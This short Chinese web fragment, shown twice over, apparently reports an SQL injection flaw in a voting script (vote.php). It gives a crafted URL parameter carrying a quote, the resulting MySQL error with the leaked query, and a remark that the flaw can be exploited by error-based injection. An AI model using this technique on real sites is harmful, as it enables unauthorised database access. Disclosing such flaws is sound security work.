<p>会记录cookie ,请求一次清除一下cookie。</p><p><a href="http://xxx.com/vote.php?act=dovote&name" rel="nofollow">http://xxx.com/vote.php?act=dovote&name</a>[a%27][111]=aa</p><p>MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] => Array ( [errno] => 1064 ) ) </p><p>利用直接暴错方式注入</p>
<p>会记录cookie ,请求一次清除一下cookie。</p><p><a href="http://xxx.com/vote.php?act=dovote&name" rel="nofollow">http://xxx.com/vote.php?act=dovote&name</a>[a%27][111]=aa</p><p>MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] => Array ( [errno] => 1064 ) ) </p><p>利用直接暴错方式注入</p>